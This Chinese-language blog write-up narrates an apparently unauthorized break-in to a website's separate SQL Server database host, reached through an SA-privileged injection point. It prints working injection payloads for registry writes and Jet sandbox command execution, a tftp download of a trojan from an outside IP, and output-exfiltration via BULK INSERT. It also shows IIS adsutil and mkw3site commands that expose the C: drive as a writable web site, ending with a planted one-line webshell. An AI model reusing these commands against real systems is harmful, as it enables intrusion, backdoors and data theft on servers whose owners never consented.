記一次巧妙的hacking~
by netpatch 
那天，正在看資料，朋友丟了個URL過來，說是SA注入點，但數(shù)據(jù)庫和WEB分離的，搞了半天沒搞定。
我一聽，SA注入點，應該很容易的說，于是就很隨意的說，OK，沒問題，等會給結果~
手工大概的判斷了下，的確是個SA注入點。判斷過程偶就不寫了，精彩的地方當然要留到后面啦
操起NBSI這把大刀就開工了。首先嘗試恢復xp_cmdshell和sp_OACreate兩擴展存儲,恢復后用兩擴展存儲隨意執(zhí)行了一個命令，但是從回顯結果來判斷，
命令沒有成功執(zhí)行。于是又恢復xp_servicecontrol擴展存儲，由于該擴展存儲沒有回顯，偶就隨意的ECHO了一個文件到一個指定目錄
然后用列目錄的功能把那目錄列了一遍，但并未發(fā)現(xiàn)寫入的文件。心想，應該是管理員把那幾個常用的hacking擴展存儲都給X了吧。
不知道xp_regwrite擴展存儲被X了沒。于是乎，手工開啟了沙盒模式
asp?idx=32;exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;-- 
然后嘗試用沙盒模式往指定目錄ECHO了個文件。
asp?idx=32 and 0<>(select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd /c echo xx 
>c:\xxx\xxx.txt")'))-- 
再用列目錄的功能把該目錄給列了一遍，發(fā)現(xiàn)ECHO命令執(zhí)行成功！HOHO，還好管理員沒把這個擴展存儲給X了。
有了可執(zhí)行命令的擴展存儲，就有了一線希望。于是想到直接用tftp UP個馬上去。。執(zhí)行tftp -i ip get muma.exe c:\muma.exe發(fā)現(xiàn)一點反映也沒有。
猜測可能被管理員限制或DEL了。于是寫了一句話的下載VBS，執(zhí)行后，老半天沒發(fā)現(xiàn)我們的馬兒，難道，難道他不能訪問外網(wǎng)？
于是，我又執(zhí)行了IPCONGFIG命令，并ECHO到np.tmp臨時文件?？墒俏覀兛床坏紼CHO的內容，怎么才能得到數(shù)據(jù)庫服務器的IP呢？嘿嘿，想想，他NBSI為什么能回顯呢
？我們也可以那樣做。
asp?idx=32;CREATE TABLE [NP_ICEHACK](ResultTxt nvarchar(1024) NULL)-- //創(chuàng)建一個放回顯內容的表
asp?idx=32 BULK INSERT [NP_ICEHACK] FROM 'np.tmp' WITH (KEEPNULLS);insert into [NP_ICEHACK] values ('g_over');Alter Table [NP_ICEHACK] add id int 
NOT NULL IDENTITY (1,1)-- //以備份的形式把臨時文件np.tmp的內容寫入NP_ICEHACK表中
然后用NBSI直接把該表跑出來。沒過一會，可愛的IP就浮現(xiàn)在我的面前。于是再操起nmap，一陣掃描。不過掃描結果有點意外。就開了個80。
難道數(shù)據(jù)庫沒分離？PING下域名其IP和得到的數(shù)據(jù)庫IP是不一樣的。不管三七二十一了，先訪問再說。。馬上打上IP訪問。
發(fā)現(xiàn)一片空白，奇怪！于是再隨意打上個目錄，還是空白。傻眼了。這這。。。這端口根據(jù)nmap的判斷是IIS 5.0啊，難道誤報？
突想，試下不就知道了。怎么個試法呢？嘿嘿，我用沙盒模式執(zhí)行了net stop w3svc命令(停止整個WEB服務)。再訪問80一看。YES，訪問不到了。連那讓人郁悶的空
白頁面也消失了?？磥碛袘?，于是我再執(zhí)行net start w3svc命令(啟動整個WEB服務).再訪問80一看，No web site is configured at this address.
呀，還有綁定域名，那不是可以做個虛擬目錄。于是執(zhí)行如下命令，查詢了幾個站點配置(把1依次往上加就可以看別的站點的配置情況)
cmd /c Cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs GET W3SVC/1/ServerBindings
查看第一個虛擬web站點的邦定端口。這里的W3SVC/1是IIS:\ LocalHostW3SVC/1的簡寫，而ServerBindings是他的屬性
還是用NBSI列出來，列到3時，發(fā)現(xiàn)其綁定了一個域名，于是執(zhí)行如下命令，添加虛擬目錄
Cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs CREATE w3svc/3/Root/np "IIsWebVirtualDir"
Cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs SET w3svc/3/root/np/Path "C:\"： 
Cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs SET w3svc/3/Root/np/AccessRead 1
Cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs SET w3svc/3/Root/np/AccessWrite 1
Cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs SET w3svc/3/Root/np/AccessScript 1 
Cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs SET w3svc/3/Root/np/EnableDirBrowsing 1
Cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs SET w3svc/3/Root/np/AccessSource 1
添加后高興的去訪問那域名www.xxx.com/np/結果發(fā)現(xiàn)還是www.xxx.com的內容，懷疑沒加成功，于是隨便訪問了一個目錄，發(fā)現(xiàn)還是www.xxx.com的內容
難道是把所有的都轉發(fā)到www.xxx.com???于是本地搭平臺測試ING。。發(fā)現(xiàn)果然如自己所料，被轉發(fā)了。
絕。。居然這樣。。經(jīng)過一段時間的思考，腦筋一轉，心想：你不讓我訪問這個站，行。。我應承你，我自己建個站去，看你轉。哼~
于是立即執(zhí)行如下命令
cmd /c cscript c:\Inetpub\AdminScripts\mkw3site.vbs -r "c:\" -t "test" -c "LocalHost" -o "80" -h "netpatch.xx.com"
把自己的域名綁定該數(shù)據(jù)庫服務器IP。再訪問netpatch.xx.com HOHO，終于可以了。
于是立即ECHO了一句話馬上去，結束了這次hacing之旅.
BTW:其實，在此次的hacking中碰到很多問題，也查閱了許多相關資料，搭平臺測試了N遍才測試OK的。并沒有文章里那么順利。
難度在于，對方只開了80且把僅有的WEB給轉發(fā)了，而且又不能訪問外網(wǎng)。
____ by NetPatch www.icehack.com & [P.T.U]
如要轉載，請保持文章完整。謝謝合作！

最新評論